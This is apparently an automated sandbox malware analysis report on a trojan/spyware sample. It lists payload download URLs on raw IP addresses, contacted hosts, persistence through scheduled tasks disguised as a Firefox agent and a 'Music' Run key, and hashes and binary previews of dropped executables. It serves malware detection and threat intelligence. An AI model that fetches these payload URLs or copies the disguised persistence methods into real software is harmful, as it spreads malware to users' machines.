                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://91.219.236.148/capibarg4187.exe, 0000002A.00000002.602443827.0000000002755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://91.219.236.18/34187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmptrue
                                                                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://194.180.174.53/capibar04187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmptrue
                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000007.00000003.305126285.000001A732068000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305709993.000001A73206A000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305214782.000001A732040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000007.00000003.305271038.000001A73204E000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305161130.000001A732048000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        194.87.235.183
                                                                                                                                                                                                        		patmushta.infoRussian Federation
                                                                                                                                                                                                        		48347MTW-ASRUfalse
                                                                                                                                                                                                        40.93.207.1
                                                                                                                                                                                                        		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        104.16.203.237
                                                                                                                                                                                                        		www.mediafire.comUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        87.240.190.72
                                                                                                                                                                                                        		vk.comRussian Federation
                                                                                                                                                                                                        		47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                                                                                                                                                                                                        188.166.28.199
                                                                                                                                                                                                        		unknownNetherlands
                                                                                                                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                        172.67.139.105
                                                                                                                                                                                                        		goo.suUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        89.223.65.17
                                                                                                                                                                                                        		host-data-coin-11.comRussian Federation
                                                                                                                                                                                                        		49345CONTINENTAL_GROUP-ASRUfalse
                                                                                                                                                                                                        54.38.220.85
                                                                                                                                                                                                        		unicupload.topFrance
                                                                                                                                                                                                        		16276OVHFRfalse
                                                                                                                                                                                                        162.159.135.233
                                                                                                                                                                                                        		cdn.discordapp.comUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        194.180.174.41
                                                                                                                                                                                                        		unknownunknown
                                                                                                                                                                                                        		39798MIVOCLOUDMDfalse
                                                                                                                                                                                                        116.202.14.219
                                                                                                                                                                                                        		mstdn.socialGermany
                                                                                                                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                                                                                                                        144.76.136.153
                                                                                                                                                                                                        		transfer.shGermany
                                                                                                                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                                                                                                                        185.7.214.171
                                                                                                                                                                                                        		unknownFrance
                                                                                                                                                                                                        		42652DELUNETDEtrue
                                                                                                                                                                                                        178.248.232.78
                                                                                                                                                                                                        		natribu.orgRussian Federation
                                                                                                                                                                                                        		197068QRATORRUfalse
                                                                                                                                                                                                        51.91.13.105
                                                                                                                                                                                                        		qoto.orgFrance
                                                                                                                                                                                                        		16276OVHFRfalse
                                                                                                                                                                                                        67.199.248.15
                                                                                                                                                                                                        		bitly.comUnited States
                                                                                                                                                                                                        		396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                                                                                                                                                        185.186.142.166
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		204490ASKONTELRUtrue
                                                                                                                                                                                                        152.0.118.227
                                                                                                                                                                                                        		amogohuigotuli.atDominican Republic
                                                                                                                                                                                                        		6400CompaniaDominicanadeTelefonosSADOfalse
                                                                                                                                                                                                        67.199.248.11
                                                                                                                                                                                                        		bit.lyUnited States
                                                                                                                                                                                                        		396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                                                                                                                                                        185.7.214.239
                                                                                                                                                                                                        		unknownFrance
                                                                                                                                                                                                        		42652DELUNETDEfalse
                                                                                                                                                                                                        189.129.105.161
                                                                                                                                                                                                        		unknownMexico
                                                                                                                                                                                                        		8151UninetSAdeCVMXfalse
                                                                                                                                                                                                        86.107.197.138
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		39855MOD-EUNLfalse
                                                                                                                                                                                                        65.108.180.72
                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                        		11022ALABANZA-BALTUStrue
                                                                                                                                                                                                        116.202.186.120
                                                                                                                                                                                                        		unknownGermany
                                                                                                                                                                                                        		24940HETZNER-ASDEtrue
                                                                                                                                                                                                        61.98.7.133
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                                                                                                        194.180.174.53
                                                                                                                                                                                                        		unknownunknown
                                                                                                                                                                                                        		39798MIVOCLOUDMDfalse
                                                                                                                                                                                                        61.98.7.132
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                                                                                                        185.233.81.115
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                        151.251.30.69
                                                                                                                                                                                                        		unknownBulgaria
                                                                                                                                                                                                        		13124IBGCBGfalse
                                                                                                                                                                                                        141.8.193.236
                                                                                                                                                                                                        		f0616073.xsph.ruRussian Federation
                                                                                                                                                                                                        		35278SPRINTHOSTRUfalse
                                                                                                                                                                                                        91.219.236.18
                                                                                                                                                                                                        		unknownHungary
                                                                                                                                                                                                        		56322SERVERASTRA-ASHUfalse
                                                                                                                                                                                                        91.243.44.130
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		395092SHOCK-1USfalse

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.1
                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                        Analysis ID:547895
                                                                                                                                                                                                        Start date:04.01.2022
                                                                                                                                                                                                        Start time:19:31:08
                                                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 16m 9s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:light
                                                                                                                                                                                                        Sample file name:nkINykHreE.exe
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                        Number of analysed new started processes analysed:49
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • HDC enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@57/40@107/34
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HDC Information:
                                                                                                                                                                                                        • Successful, ratio: 26.6% (good quality ratio 19.6%)
                                                                                                                                                                                                        • Quality average: 58%
                                                                                                                                                                                                        • Quality standard deviation: 40.4%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 74%
                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        Warnings:
                                                                                                                                                                                                        Show All
                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.213.168.66, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, elew3le3lanle.freeddns.org, store-images.s-microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        19:32:13API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                        19:32:47Task SchedulerRun new task: Firefox Default Browser Agent 57D5564316429876 path: C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        19:33:27Task SchedulerRun new task: Firefox Default Browser Agent FA0C4CD8D97D977B path: C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        19:33:28API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                        19:33:36API Interceptor1x Sleep call for process: 2757.exe modified
                                                                                                                                                                                                        19:33:56API Interceptor2x Sleep call for process: 4187.exe modified
                                                                                                                                                                                                        19:34:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Music "C:\Users\user\AppData\Roaming\Music\Music.exe"
                                                                                                                                                                                                        19:34:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Music "C:\Users\user\AppData\Roaming\Music\Music.exe"

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        ASN

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:MPEG-4 LOAS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                        Entropy (8bit):0.24857862142789358
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU42:BJiRdwfu2SRU42
                                                                                                                                                                                                        MD5:2A0ECA1698DAC02C685F470FF624FF73
                                                                                                                                                                                                        SHA1:B8250FAB9FE7DC4BD428779AF392893D157C4AD6
                                                                                                                                                                                                        SHA-256:B6B4013F5FCDA7AF3F4D249B6DB3B491BA688EE1F0D8BF49FF9BB9B77C8A7A59
                                                                                                                                                                                                        SHA-512:607FB01FE53B1D424D39DF6C67F5CBE569F9F678DC9E434EDC69FE26D5BD392EF4F8C10542268246241441AE6A30B53E4E7E7270EEBC76E41BAAFB55685DDF31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x250ef644, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):786432
                                                                                                                                                                                                        Entropy (8bit):0.25059013638213035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:0+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:LSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                                        MD5:599F97CEA152346091DED811F2AC97D0
                                                                                                                                                                                                        SHA1:90BE68D3225D157ABACA71817F0796E8A9D93FA6
                                                                                                                                                                                                        SHA-256:B5E37DA5E782434B72D3F7F6B763751950450DBA3D94B9F92FB5EAEC40430A3E
                                                                                                                                                                                                        SHA-512:AF9E5BE4EAF0FE3B8BFEB440A6D49D1D18B0E2E2883236D6701C6B8A90A91D186B7F00AABB9A3F34E089358826D48D871BABFC29CC8FCE7CC3CB14E4445850D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: %..D... ................e.f.3...w........................&..........w... ...zu.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................X..R. ...zu.................iG.G. ...zu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.07509385199835537
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Am17Evrc88l/bJdAtiPIF1All3Vkttlmlnl:D1i38t4M41A3
                                                                                                                                                                                                        MD5:641F90FED18A8DC34616C7FB5B02935E
                                                                                                                                                                                                        SHA1:A8E7391E4C41BC5821C336DE2CD26E4C24799685
                                                                                                                                                                                                        SHA-256:033E0B5558CE302B744B7F2608DF9D1DD114B5B932D7FD8B2F0EB89994910CF1
                                                                                                                                                                                                        SHA-512:8CE75AF915AB2B478CFA029CC73961730CA528082DE7645597C9959F0E49016421BB08885C0099CCC49D4CE02849EEBC4F731B72CB8542DE0D9F22DC57DDBFE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: O........................................3...w... ...zu......w...............w.......w....:O.....w..................iG.G. ...zu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\sqlite3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):645592
                                                                                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CBA.exe.log
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):700
                                                                                                                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\sqlite3[1].dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):645592
                                                                                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\115B.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):343040
                                                                                                                                                                                                        Entropy (8bit):6.634640145792183
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5lA3X2bDueST6gKO1tqT7b4YlCTFGbGQ273pQGfT:5lA3X22e0VKYY70A4FOGQKt
                                                                                                                                                                                                        MD5:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        SHA1:4B7528999AD6095B3FBB3AEC059EFB88D999EA95
                                                                                                                                                                                                        SHA-256:26A4C5B36D9FDE80EA47137EB53B40DACF240432A5895F98417EAE51B6B681DA
                                                                                                                                                                                                        SHA-512:977AAB0AC60948315435E0698058598F40F42D7830B87EE7668BB209938CB388AA5B07C13B66C56DB1AFFA6F86A859B3C01666A22E437C808B6C9DB38975C7B0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L....(._.................@...................P....@.........................................................................l=..(.......`....................P..8#..`............................... ...@............................................text....>.......@.................. ..`.data...H%...P.......D..............@....bekuvox.............Z..............@....jutu...K............\..............@....vezev...............^..............@....mubone..............`..............@....rsrc...`............n..............@..@.reloc...>...P...@..................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\13E0.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2030423
                                                                                                                                                                                                        Entropy (8bit):6.581224020190253
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:hZ7Xar2VsBq/OebTdhbj8C2cBiw9PVf7x3Tszozbaw2pYqZEWzMdX3UdN9RdN:NswfblVPZv32pYqZ3aUdjRdN
                                                                                                                                                                                                        MD5:AA519DEEB511E886E73F8E0256180800
                                                                                                                                                                                                        SHA1:653B5155ABD17EB35F13543EED5F3A0794000171
                                                                                                                                                                                                        SHA-256:B8EDF8B69FD72F728790CAC7FA5F2642A5C386EEC1ACE836CD05A19177252E2B
                                                                                                                                                                                                        SHA-512:6156B3391118A458130C6FF6FE8B0B0B05895B16E8B43C6A269C4D5A9136BB622E3AEC6B13C1D397C00642A82563A830D43CAB48D6BC7824090BB7174C65D428
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.k...k...k..c.a..k..c.c.[k..c.b..k..I.W..k...5./.k...5./.k...5./.k.......k.......k...k..!k..@5./.k..@5./.k..E5o..k..@5./.k..Rich.k..........PE..L....}|^.................V...........4.......p....@.......................................@.............................4...4...<....p.......................P...&..`...T...............................@............p.. ............................text....U.......V.................. ..`.rdata..t....p.......Z..............@..@.data....N..........................@....gfids.......`......................@..@.rsrc........p......................@..@.reloc...&...P...(..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):342528
                                                                                                                                                                                                        Entropy (8bit):6.631057078600846
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:7AH3plu5xWDwtTwKc6+9YwoTPxSeI2co8mfgW:7AH3pCxvTS6Wh6PIeI/
                                                                                                                                                                                                        MD5:B7B184D2B0910148CABB9B5E915753D6
                                                                                                                                                                                                        SHA1:C5285CFF52A33103F1511D1049185F767F656BF9
                                                                                                                                                                                                        SHA-256:65D20D76E0E30EFBCD8D9864BDB6BA40C22C7148A0397EE4484C303F2BED12A1
